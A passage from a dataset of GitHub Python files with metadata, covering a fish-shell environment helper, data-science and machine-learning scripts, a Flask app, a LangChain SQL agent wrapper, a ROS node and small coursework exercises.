expected_tables)\n","repo_name":"hippich/Bitcoin-Poker-Room","sub_path":"lib/ppn/tests/test_tableconfigutils.py","file_name":"test_tableconfigutils.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"61"}
+{"seq_id":"8757726929","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport argparse\nimport os\nfrom subprocess import check_output\nimport sys\n\nimport six\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Modify environment in fish shell with variables from '\n 'script output, e.g. ssh-add.')\n parser.add_argument('ARGS', nargs='*')\n args = parser.parse_args()\n\n if args.ARGS:\n output = check_output('eval $({}) > /dev/null; printenv'\n .format(' '.join(args.ARGS)),\n shell=True)\n new_env = parse_printenv(output)\n else:\n new_env = parse_printenv(sys.stdin)\n\n diff = dict_diff(os.environ, new_env)\n print(fishify(diff))\n\n\ndef parse_printenv(output):\n if isinstance(output, bytes):\n lines = (l for l in output.splitlines())\n elif hasattr(output, 'read'):\n lines = output\n\n env = {}\n for line in lines:\n try:\n decoded = line.decode('utf-8')\n except AttributeError:\n decoded = line\n var, val = decoded.split('=', 1)\n env[var] = val.strip()\n return env\n\n\ndef dict_diff(this, that):\n diff = set(that.keys()) - set(this.keys())\n return {key: that[key] for key in diff}\n\n\ndef fishify(env):\n return '; and '.join('set -x {} {}'.format(k, v)\n for k, v in six.iteritems(env))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Perlence/fishify","sub_path":"fishify.py","file_name":"fishify.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15924293181","text":"import csv\r\nimport numpy as np\r\nimport plotly.express as px\r\ndef plotfigure(data_path):\r\n with open(data_path) as f:\r\n df=csv.DictReader(f)\r\n graph=px.scatter(df,x=\"Coffee in ml\", y=\"sleep in hours\")\r\n graph.show()\r\ndef getdatasource(data_path):\r\n Coffee=[]\r\n Hours=[]\r\n with open(data_path) as f:\r\n reader=csv.DictReader(f)\r\n for row in reader:\r\n Coffee.append(float(row[\"Coffee in ml\"]))\r\n Hours.append(float(row[\"sleep in hours\"]))\r\n return {\"x\":Coffee, \"y\":Hours}\r\n\r\ndef findcorrelation(datasource):\r\n correlation=np.corrcoef(datasource[\"x\"],datasource[\"y\"])\r\n print(\"correlation coefficient: \\n\", correlation[0,1])\r\n\r\ndef setup():\r\n data_path='Coffee.csv'\r\n datasource=getdatasource(data_path)\r\n findcorrelation(datasource)\r\n plotfigure(data_path)\r\nsetup()","repo_name":"SHANVI-PRASAD/correlation","sub_path":"Coffee.py","file_name":"Coffee.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42175906341","text":"from flask import Flask\n\n\ndef create_app():\n app = Flask(__name__)\n\n @app.route(\"/\")\n def hello_world():\n return \"Hello, World!!!!!!!\"\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run(threaded=True, host='0.0.0.0', port=5000)\n\n","repo_name":"AntonAleksandrov13/devops101","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"15220694026","text":"from langchain.agents import create_sql_agent\nfrom langchain.agents.agent_toolkits import SQLDatabaseToolkit\nfrom langchain.sql_database import SQLDatabase\nfrom langchain.llms.openai import OpenAI\n\nfrom prompts import MSSQL_AGENT_PREFIX\n\n\n\nclass SQLAgent:\n def __init__(self, database_uri: str, llm: OpenAI, tables: list):\n self.database_uri = database_uri\n self.llm = llm\n self.tables = tables\n\n def create(self):\n db = SQLDatabase.from_uri(\n database_uri=self.database_uri,\n sample_rows_in_table_info=1,\n include_tables=self.tables,\n view_support=True,\n )\n\n toolkit = SQLDatabaseToolkit(db=db, llm=self.llm)\n return create_sql_agent(\n llm=self.llm,\n toolkit=toolkit,\n verbose=False,\n prefix=MSSQL_AGENT_PREFIX,\n # format_instructions=SQL_AGENT_FORMAT_INSTRUCTIONS,\n )\n\n async def arun(self, query: str):\n agent = self.create()\n return agent.run(query)\n\n def run(self, query: str):\n agent = self.create()\n return agent.run(query)\n","repo_name":"dpastra-na/matti_ai_lambda_test","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39746220396","text":"#!/bin/env python3\nimport sys, json, gzip\nfrom couchws import *\n\ndb = sys.argv[1]\nrequest = \"/\"+db+\"/\"+\"_all_docs?include_docs=true\"\nresponse = couch_webservice_request(request)\nresult={'docs': []}\ndocs = result['docs']\ndesign = []\nfor it in response['rows']:\n doc = it['doc']\n if '_rev' in doc:\n del doc['_rev']\n docs.append(doc)\nif sys.argv[2].endswith('.gz'):\n wh = gzip.open(sys.argv[2],'w')\n wh.write(json.dumps(result,indent=2).encode())\nelse:\n wh = open(sys.argv[2],'w')\n wh.write(json.dumps(result,indent=2))\nwh.close()\n","repo_name":"Bowen999/Gene_Protein_Disease_Database","sub_path":"scripts/couchdb2file.py","file_name":"couchdb2file.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4580708439","text":"\"\"\"Linear loss regression module\"\"\"\n# -----------------------------------------------------------------------------\n# Module imports\n# -----------------------------------------------------------------------------\n# system\nimport os\nimport sys\n# nd arrays\nimport numpy as np\n# user modules\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), '..', 'ex01'))\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), '..', 'ex06'))\nfrom ridge import type_validator, shape_validator\nfrom l2_reg import l2\n\n\n# -----------------------------------------------------------------------------\n# Regularized linear regression loss\n# -----------------------------------------------------------------------------\n@type_validator\n@shape_validator({'y': ('m', 1), 'y_hat': ('m', 1), 'theta': ('n', 1)})\ndef reg_loss_(y: np.ndarray, y_hat: np.ndarray, theta: np.ndarray,\n lambda_: float) -> float:\n \"\"\"\n Computes the regularized loss of a linear regression model from two\n non-empty numpy.array, without any for loop.Args:\n y: has to be an numpy.ndarray, a vector of shape m * 1.\n y_hat: has to be an numpy.ndarray, a vector of shape m * 1.\n theta: has to be a numpy.ndarray, a vector of shape n * 1.\n lambda_: has to be a float.\n Returns:\n The regularized loss as a float.\n None if y, y_hat, or theta are empty numpy.ndarray.\n None if y and y_hat do not share the same shapes.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n m, _ = y.shape\n loss = float((((y_hat - y).T.dot(y_hat - y)) / (2 * m))[0][0])\n regularization_term = (lambda_ / (2 * m)) * l2(theta)\n return loss + regularization_term\n except:\n return None\n\n\n# -----------------------------------------------------------------------------\n# Tests\n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n\n y = np.array([2, 14, -13, 5, 12, 4, -19]).reshape((-1, 1))\n y_hat = np.array([3, 13, -11.5, 5, 11, 5, -20]).reshape((-1, 1))\n theta = np.array([1, 2.5, 1.5, -0.9]).reshape((-1, 1))\n\n # Example :\n print(f'ex00: {reg_loss_(y, y_hat, theta, .5)}\\n')\n # Output:\n # 0.8503571428571429\n\n # Example :\n print(f'ex01: {reg_loss_(y, y_hat, theta, .05)}\\n')\n # Output:\n # 0.5511071428571429\n\n # Example :\n print(f'ex02: {reg_loss_(y, y_hat, theta, .9)}\\n')\n # Output:\n # 1.116357142857143\n","repo_name":"twagger/bootcamp_machine-learning","sub_path":"module04/ex02/linear_loss_reg.py","file_name":"linear_loss_reg.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11512348801","text":"def general_list(value):\n result = []\n for i in range(value):\n result.append(i)\n return result\n\nprint(general_list(50))\n\nimport sys\nresult = general_list(50)\nprint(sys.getsizeof(result))\n\ndef generator_list(value):\n result = []\n for i in range(value):\n yield i\n\nprint(generator_list(50))\n\nfor a in generator_list(50):\n print(a)\n\n# 제너레이터를 만들면 메모리를 줄일 수 있다.\n# 값이 필요할 때만 호출하여 사용\nresult = generator_list(50)\nprint(sys.getsizeof(result))\n\n# generator comprehension\n# 일반적인 iterator는 generator에 반해 훨씬 큰 메모리 용량을 사용\ngen_ex = (n*n for n in range(500))\nprint(type(gen_ex))\n\n# Why and When generators\nprint(sys.getsizeof(gen_ex))\n\nprint(sys.getsizeof(list(gen_ex)))\n\nlist_ex = [n*n for n in range(500)]\nprint(sys.getsizeof(list_ex))\n","repo_name":"updaun/PythonBasic","sub_path":"pythonic_code/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71589666753","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\n\ndef chatter_callback(message):\n #get_caller_id(): Get fully resolved name of local node\n rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", message.data)\ndef talker():\n\t\t\n print(\"talker entered\")\n \n pub = rospy.Publisher('chatting', String, queue_size=10)\n \n\n \n #set the loop rate\n rate = rospy.Rate(1) # 1hz\n \n i = 0\n while (i<2):\n\t\n hello_str = raw_input()\n rospy.loginfo(hello_str)\n pub.publish(hello_str)\n rate.sleep()\n i=i+1\n\n \n\nrospy.init_node('listener', anonymous=True)\n\n \n \n\nrospy.Subscriber(\"chatter\", String, chatter_callback)\n\n \n \n\nwhile True:\n talker()\n\t\n\t\n\n\n\n\t\t\n","repo_name":"daksh-025/codes","sub_path":"listner.py","file_name":"listner.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26783180210","text":"import argparse\nimport os\nfrom functools import partial\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import SubsetRandomSampler\nfrom torchvision.datasets import MNIST\nfrom torchvision import transforms\n\n# Import from local helper file\nfrom helper import parse_cmdline_args\nfrom helper import compute_mae_and_rmse\nfrom helper import resnet34base\n\n\n# Argparse helper\nparser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nargs = parse_cmdline_args(parser)\n\n##########################\n# Settings and Setup\n##########################\n\nNUM_WORKERS = args.numworkers\nLEARNING_RATE = args.learningrate\nNUM_EPOCHS = args.epochs\nBATCH_SIZE = args.batchsize\nOUTPUT_DIR = args.output_dir\nLOSS_PRINT_INTERVAL = args.loss_print_interval\n\nif os.path.exists(args.output_dir):\n raise ValueError('Output directory already exists.')\nelse:\n os.makedirs(args.output_dir)\nBEST_MODEL_PATH = os.path.join(args.output_dir, 'best_model.pt')\nLOGFILE_PATH = os.path.join(args.output_dir, 'training.log')\n\nif args.cuda >= 0 and torch.cuda.is_available():\n DEVICE = torch.device(f'cuda:{args.cuda}')\nelse:\n DEVICE = torch.device('cpu')\n\nif args.seed == -1:\n RANDOM_SEED = None\nelse:\n RANDOM_SEED = args.seed\n\n\n############################\n# Dataset\n############################\n\ndef train_transform():\n return transforms.Compose([transforms.ToTensor()])\n\n\ndef validation_transform():\n return transforms.Compose([transforms.ToTensor()])\n\n\nNUM_CLASSES = 10\nGRAYSCALE = True\nRESNET34_AVGPOOLSIZE = 1\n\ntrain_dataset = MNIST(root='./datasets',\n train=True,\n download=True,\n transform=train_transform())\n\nvalid_dataset = MNIST(root='./datasets',\n train=True,\n transform=validation_transform(),\n download=False)\n\ntest_dataset = MNIST(root='./datasets',\n train=False,\n transform=validation_transform(),\n download=False)\n\ntrain_indices = torch.arange(1000, 60000)\nvalid_indices = torch.arange(0, 1000)\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(valid_indices)\n\ntrain_loader = DataLoader(dataset=train_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False, # SubsetRandomSampler shuffles\n drop_last=True,\n num_workers=NUM_WORKERS,\n sampler=train_sampler)\n\nvalid_loader = DataLoader(dataset=valid_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=NUM_WORKERS,\n sampler=valid_sampler)\n\ntest_loader = DataLoader(dataset=test_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=NUM_WORKERS)\n\n\n##########################\n# MODEL\n##########################\n\nmodel = resnet34base(\n num_classes=NUM_CLASSES,\n grayscale=GRAYSCALE,\n resnet34_avg_poolsize=RESNET34_AVGPOOLSIZE)\n\n\nmodel.output_layer = torch.nn.Linear(512, NUM_CLASSES)\n\n\ndef forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n\n x = x.view(x.size(0), -1)\n logits = self.output_layer(x)\n return logits\n\n\ndef add_method(obj, func):\n 'Bind a function and store it in an object'\n setattr(obj, func.__name__, partial(func, obj))\n\n\nadd_method(model, forward)\nmodel.to(DEVICE)\noptimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)\n\n\n#######################################\n# Utility Functions\n#######################################\n\n\ndef label_from_logits(logits):\n _, predicted_labels = torch.max(logits, 1)\n return predicted_labels\n\n\n#######################################\n# Training\n#######################################\n\n\nbest_valid_mae = torch.tensor(float('inf'))\n\ns = (f'Script: {__file__}\\n'\n f'PyTorch version: {torch.__version__}\\n'\n f'Device: {DEVICE}\\n'\n f'Learning rate: {LEARNING_RATE}\\n'\n f'Batch size: {BATCH_SIZE}\\n')\n\nprint(s)\nwith open(LOGFILE_PATH, 'w') as f:\n f.write(f'{s}\\n')\n\nstart_time = time.time()\n\nfor epoch in range(1, NUM_EPOCHS+1):\n\n model.train()\n for batch_idx, (features, targets) in enumerate(train_loader):\n\n features = features.to(DEVICE)\n targets = targets.to(DEVICE)\n\n # FORWARD AND BACK PROP\n logits = model(features)\n\n # CORN loss\n loss = torch.nn.functional.cross_entropy(logits, targets)\n # ##--------------------------------------------------------------------###\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Logging\n if not batch_idx % LOSS_PRINT_INTERVAL:\n s = (f'Epoch: {epoch:03d}/{NUM_EPOCHS:03d} | '\n f'Batch {batch_idx:04d}/'\n f'{len(train_dataset)//BATCH_SIZE:04d} | '\n f'Loss: {loss:.4f}')\n print(s)\n with open(LOGFILE_PATH, 'a') as f:\n f.write(f'{s}\\n')\n\n # Logging: Evaluate after epoch\n model.eval()\n with torch.no_grad():\n valid_mae, valid_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n if valid_mae < best_valid_mae:\n best_valid_mae = valid_mae\n best_epoch = epoch\n torch.save(model.state_dict(), BEST_MODEL_PATH)\n\n s = (f'MAE Current Valid: {valid_mae:.2f} Ep. {epoch}'\n f' | Best Valid: {best_valid_mae:.2f} Ep. {best_epoch}')\n s += f'\\nTime elapsed: {(time.time() - start_time)/60:.2f} min'\n print(s)\n with open(LOGFILE_PATH, 'a') as f:\n f.write('%s\\n' % s)\n\n\n# Final\nmodel.load_state_dict(torch.load(BEST_MODEL_PATH))\nmodel.eval()\nwith torch.no_grad():\n\n train_mae, train_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=train_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n valid_mae, valid_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n test_mae, test_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\ns = ('\\n\\n=========================================\\n\\n'\n 'Performance of best model based on validation set MAE:'\n f'Train MAE / RMSE: {train_mae:.2f} / {train_rmse:.2f}'\n f'Valid MAE / RMSE: {valid_mae:.2f} / {valid_rmse:.2f}'\n f'Test MAE / RMSE: {test_mae:.2f} / {test_rmse:.2f}')\n","repo_name":"Raschka-research-group/corn-ordinal-neuralnet","sub_path":"model-code/simple-scripts/resnet34_classifier.py","file_name":"resnet34_classifier.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"}
+{"seq_id":"37462872949","text":"import unittest\nfrom io import BytesIO\nimport streamlit as st\nfrom src.backend.data_manipulation import DataFrameHandler\n\nclass TestDataFrameHandler(unittest.TestCase):\n\n def test_get_num_col(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_numeric_columns()\n\n # unit testing time\n self.assertEqual(lst[0], \"Id\")\n self.assertEqual(lst[1], \"SepalLengthCm\")\n self.assertEqual(lst[2], \"SepalWidthCm\")\n self.assertEqual(lst[3], \"PetalLengthCm\")\n self.assertEqual(lst[4], \"PetalWidthCm\")\n\n def test_get_cat_col(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_categorical_columns()\n\n # unit testing time\n self.assertEqual(lst[0], \"Species\")\n\n def test_get_col_cats(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_column_categories(\"Species\")\n\n # unit testing time\n self.assertEqual(lst[0], \"Iris-setosa\")\n self.assertEqual(lst[1], \"Iris-versicolor\")\n self.assertEqual(lst[2], \"Iris-virginica\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"hbaghar/statistics-for-dummies","sub_path":"test/test_DataFrameHandler.py","file_name":"test_DataFrameHandler.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20006134147","text":"#!/home/jeremy/ProjectPython/bin/python\n# -*- coding: utf-8 -*-\n#\n# script.py\n#\n\nimport sys\nimport os\nimport re\nimport logging\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_page(url):\n try:\n rs = requests.get(url)\n except ConnectionError:\n logging.warn('Unable to open {}'.format(url))\n return None\n return BeautifulSoup(rs.text, 'lxml')\n \n \ndef get_text_content(soup):\n body = soup.find('body')\n\n for em in body.findAll('em'):\n parent = em.parent\n text = next(em.stripped_strings, None)\n em.replace_with('*' + text + '* ')\n \n #~ for tag in body.findAll(['style', 'script']):\n #~ tag.dispose()\n\n \n return [dict(name=t.parent.name, text=t.get_text(separator=\"|\", strip=True)) for t in body.findAll('p')] or None\n","repo_name":"jallanxjallan/lib3.6","sub_path":"document/web_page.py","file_name":"web_page.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35082900889","text":"#!/usr/bin/python3\n\"\"\"\nModule: 4-print_square\nFunction: def print_square()\n\"\"\"\n\n\ndef print_square(size):\n \"\"\"\n returns a square '#' defined\n by size\n \"\"\"\n\n if isinstance(size, float) and size < 0 or not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n\n [print('#' * size) for count in range(size)]\n","repo_name":"cecilia-89/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22790044743","text":"import numpy as np\nimport pickle\nfrom PIL import Image\nimport os\nfrom matplotlib import pyplot as plt\nimport random\nfrom scipy.ndimage import zoom\n\n\ndef clipped_zoom(img, zoom_factor, **kwargs):\n\n h, w = img.shape[:2]\n\n # For multichannel images we don't want to apply the zoom factor to the RGB\n # dimension, so instead we create a tuple of zoom factors, one per array\n # dimension, with 1's for any trailing dimensions after the width and height.\n zoom_tuple = (zoom_factor,) * 2 + (1,) * (img.ndim - 2)\n\n # Zooming out\n if zoom_factor < 1:\n\n # Bounding box of the zoomed-out image within the output array\n zh = int(np.round(h * zoom_factor))\n zw = int(np.round(w * zoom_factor))\n\n top = (h - zh) // 2\n left = (w - zw) // 2\n\n # Zero-padding\n\n out = np.zeros_like(img)\n out[top:top+zh, left:left+zw] = zoom(img, zoom_tuple, **kwargs)\n\n # Zooming in\n elif zoom_factor > 1:\n\n # Bounding box of the zoomed-in region within the input array\n zh = int(np.round(h / zoom_factor))\n zw = int(np.round(w / zoom_factor))\n top = (h - zh) // 2\n left = (w - zw) // 2\n\n\n out = zoom(img[top:top+zh, left:left+zw], zoom_tuple, **kwargs)\n\n # `out` might still be slightly larger than `img` due to rounding, so\n # trim off any extra pixels at the edges\n trim_top = ((out.shape[0] - h) // 2)\n trim_left = ((out.shape[1] - w) // 2)\n\n\n if trim_top<0:\n out = img\n # print(zoom_factor)\n\n else:\n out = out[trim_top:trim_top+h, trim_left:trim_left+w]\n\n\n # If zoom_factor == 1, just return the input array\n else:\n out = img\n\n return out\n\n\n\n\ndef make_oral_cancer(val_splits):\n\ttrain_data = np.zeros([72000, 80, 80])\n\ttrain_label = np.zeros([72000])\n\ttest_data = np.zeros([55000, 80, 80])\n\ttest_label = np.zeros([55000])\n\n\t# train data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Cancer', imagename)).convert('L')\n\t\ttrain_data[i,:,:] = np.asarray(image)\n\t\ttrain_label[i] = 0\n\t\ti += 1\n\t\tif i == 22000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Healthy', imagename)).convert('L')\n\t\ttrain_data[i,:,:] = np.asarray(image)\n\t\ttrain_label[i] = 1\n\t\ti += 1\n\t\tif i == 72000:\n\t\t\tbreak\n\t# test data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Cancer', imagename)).convert('L')\n\t\ttest_data[i,:,:] = np.asarray(image)\n\t\ttest_label[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Healthy', imagename)).convert('L')\n\t\ttest_data[i,:,:] = np.asarray(image)\n\t\ttest_label[i] = 1\n\t\ti += 1\n\t\tif i == 55000:\n\t\t\tbreak\n\n\ttry:\n\t\tos.mkdir('OralCancer/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data.shape[0])\n\t\ttrain_data = train_data[perm,:,:]\n\t\ttrain_label = train_label[perm]\n\n\t\tperm = np.random.permutation(test_data.shape[0])\n\t\ttest_data = test_data[perm,:,:]\n\t\ttest_label = test_label[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data\n\t\tdict['train_label'] = train_label\n\t\tdict['test_data'] = test_data\n\t\tdict['test_label'] = test_label\n\n\t\tpickle.dump(dict,open('oral_cancer_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\n\ndef normalize(image):\n\t# minimum = np.min(image, axis=(0,1), keepdims=True)\n\t# maximum = np.max(image, axis=(0,1), keepdims=True)\n\t# return (image-minimum)/(maximum-minimum)\n\treturn image/255\n\ndef make_oral_caner_scale(val_splits):\n\ttrain_data = np.zeros([70000, 80, 80, 3])\n\ttrain_data_scale = np.zeros([70000, 80, 80, 3])\n\ttrain_label = np.zeros([70000])\n\ttrain_label_scale = np.zeros([70000])\n\ttest_data = np.zeros([50000, 80, 80, 3])\n\ttest_label = np.zeros([50000])\n\n\t# train data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Cancer', imagename))\n\t\timage = np.asarray(image)\n\t\ttrain_data[i,:,:,:] = normalize(image)\n\t\ttrain_label[i] = 0\n\t\t# for augmentation\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttrain_data_scale[i,:,:,:] = normalize(image_scaled)\n\t\ttrain_label_scale[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Healthy', imagename))\n\t\timage = np.asarray(image)\n\t\ttrain_data[i,:,:,:] = normalize(image)\n\t\ttrain_label[i] = 1\n\t\t# for augmentation\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttrain_data_scale[i,:,:,:] = normalize(image_scaled)\n\t\ttrain_label_scale[i] = 1\n\t\ti += 1\n\t\tif i == 70000:\n\t\t\tbreak\n\t# test data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Cancer', imagename))\n\t\timage = np.asarray(image)\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttest_data[i,:,:,:] = normalize(image_scaled)\n\t\ttest_label[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Healthy', imagename))\n\t\timage = np.asarray(image)\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttest_data[i,:,:,:] = normalize(image_scaled)\n\t\ttest_label[i] = 1\n\t\ti += 1\n\t\tif i == 50000:\n\t\t\tbreak\n\n\ttry:\n\t\tos.mkdir('OralCancer-Scale/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer-Scale/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data.shape[0])\n\t\ttrain_data = train_data[perm,:,:]\n\t\ttrain_label = train_label[perm]\n\n\t\tperm = np.random.permutation(test_data.shape[0])\n\t\ttest_data = test_data[perm,:,:]\n\t\ttest_label = test_label[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data\n\t\tdict['train_label'] = train_label\n\t\tdict['test_data'] = test_data\n\t\tdict['test_label'] = test_label\n\n\t\tpickle.dump(dict,open('oral_cancer_scale_new_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\tos.chdir('..')\n\n\ttry:\n\t\tos.mkdir('OralCancer-Scale-For-Augmentation/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer-Scale-For-Augmentation/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data_scale.shape[0])\n\t\ttrain_data_scale = train_data_scale[perm,:,:]\n\t\ttrain_label_scale = train_label_scale[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data_scale\n\t\tdict['train_label'] = train_label_scale\n\n\t\tpickle.dump(dict,open('oral_cancer_scale_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\tos.chdir('..')\n\n\nif __name__ == '__main__':\n\t# make_oral_cancer(6)\n\tmake_oral_caner_scale(6)\n","repo_name":"wsgdrfz/Scale-invariant-CNNs","sub_path":"src/pytorch/Make_OralCancer.py","file_name":"Make_OralCancer.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"}
+{"seq_id":"34930130413","text":"import psycopg2\n\n\n#connection to \"chinook\" database\nconnection = psycopg2.connect(database=\"chinook\")\n\n#build cursor object of database\ncursor = connection.cursor()\n\n#Query 1 - fetch all records from * Artist * table\ncursor.execute('SELECT * FROM \"Track\" WHERE \"Composer\" = %s', [\"AC/DC\"])\n\n#fetch all results\nresults = cursor.fetchall()\n\n#fetch one result\n# oneresult = cursor.fetchone()\n\n#close the connection\nconnection.close()\n\n#print results\nfor result in results:\n print(result)\n","repo_name":"Jays-T/SQLtesting","sub_path":"sql-psycopg2.py","file_name":"sql-psycopg2.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
